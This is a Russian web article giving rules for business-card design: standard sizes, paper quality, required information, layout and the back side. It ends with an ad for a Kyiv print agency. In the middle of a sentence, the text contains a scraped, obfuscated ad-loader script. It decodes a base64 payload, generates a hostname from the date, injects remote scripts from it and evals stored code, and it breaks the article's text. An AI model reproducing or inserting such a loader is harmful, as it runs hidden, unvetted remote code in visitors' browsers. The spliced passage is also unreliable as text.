Правила оформления визитки

Визитная карточка – вид полиграфической продукции, завоевавший широкую популярность в качестве инструмента, используемого для обмена контактными данными между деловыми партнерами и для предоставления данных фирмы клиенту.

Визитка представляет собой миниатюрное изделие из плотной бумаги (как правило, прямоугольной формы), на которой размещена информация о человеке или компании с указанием контактной информации для связи: название фирмы, ФИО, должность, номера телефонов, электронные адреса, юридический/фактический адрес.

Несмотря на то, что каких-либо строгих требований и жестких ограничений к оформлению визитных карточек не существует, и их дизайн в главной степени зависит от личных предпочтений будущего владельца и от брендбука компании, все же некоторые правил оформления визиток есть.

Размер

Стандартный размер визитных карточек, принятый в странах СНГ, — 90х50 мм. При желании, можно отдать предпочтение европейскому формату, и заказать изделия размером 85х55 мм, для фирменных и корпоративных визиток допустимо увеличение формата до 105х75мм.

Вопросу определения размера следует уделить должное внимание, и иметь в виду, что меньшую карточку удобнее поместить в портмоне или визитницу.

Качество бумаги

Ключевой элемент визитной карточки – бумага, на которой она отпечатана. Ее качество и плотность в наибольшей степени влияют на то, какое впечатление она произведет, попав в руки партнеру или потенциальному клиенту. Внимания заслуживает и оттенок материала. Следует иметь в виду, что кипенно-белая бумага быстро утратит свою первоначальную чистоту и эстетичность, в то время как излишне темная потребует совсем иного типа чернил.

Информация

Вся информация, представляемая на визитной карточке, включает в себя три основных блока: (adsbygoogle = window.adsbygoogle || []).push({}); var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Фамилия и имя человека. Что касается отчества, то его указывать не обязательно, это зависит от принятых в компании норм и стандартов, в случае корпоративной визитки, или от пожеланий самого человека, если речь идет о личной.Логотип. К изображению и размещению фирменного стиля компании не выдвигается никаких особенных требований. Самое главное, чтобы логотип гармонично дополнял общую картину, не был излишне крупным, «не перетягивал» на себя общее внимание, тем самым ухудшая читабельность визитки.Контактная информация. Данный блок включает в себя: номер/номера телефона для связи, адрес электронной почты, юридический адрес предприятия и его фактическое местоположение.

Что касается размера шрифта, то его не стоит делать очень крупным. Как показывает практика, к более мелкому размеру букв люди присматриваются более тщательно, боясь что-то упустить.

Элементы дизайна

Использование любых дизайнерских элементов, фигур и градиента рекомендуется свести к минимуму, или, что еще лучше, — полностью от них отказаться. Это обусловлено тем, что главное в визитной карточке – размещенная на ней информация. Логотип и текстовые блоки должны располагаться так, чтобы вокруг них оставалось свободное пространство. Из-за несоблюдения этого правила, человек, рассматривающий визитку, может столкнуться с трудностями в ее прочтении.

Обратная сторона визитной карточки

Эту часть визитки в большинстве случаев оставляют пустой, чтобы дать возможность делать там дополнительные записи или пометки. Иногда обратную сторону карточки используют для размещения карты или схемы проезда к офису компании.

Важность грамотного и эстетичного оформления визитной карточки сложно переоценить – качественный и хорошо продуманный дизайн позволяет ей не только выступать носителем контактных данных, но и производить сильный рекламный эффект.

Где заказать?

Рекламное агентство полного цикла Внимание предлагает печать визиток в Киеве. Любой тираж, доступные цены, быстрое и качественное исполнение!
(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/pravila-oformleniya-vizitki/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top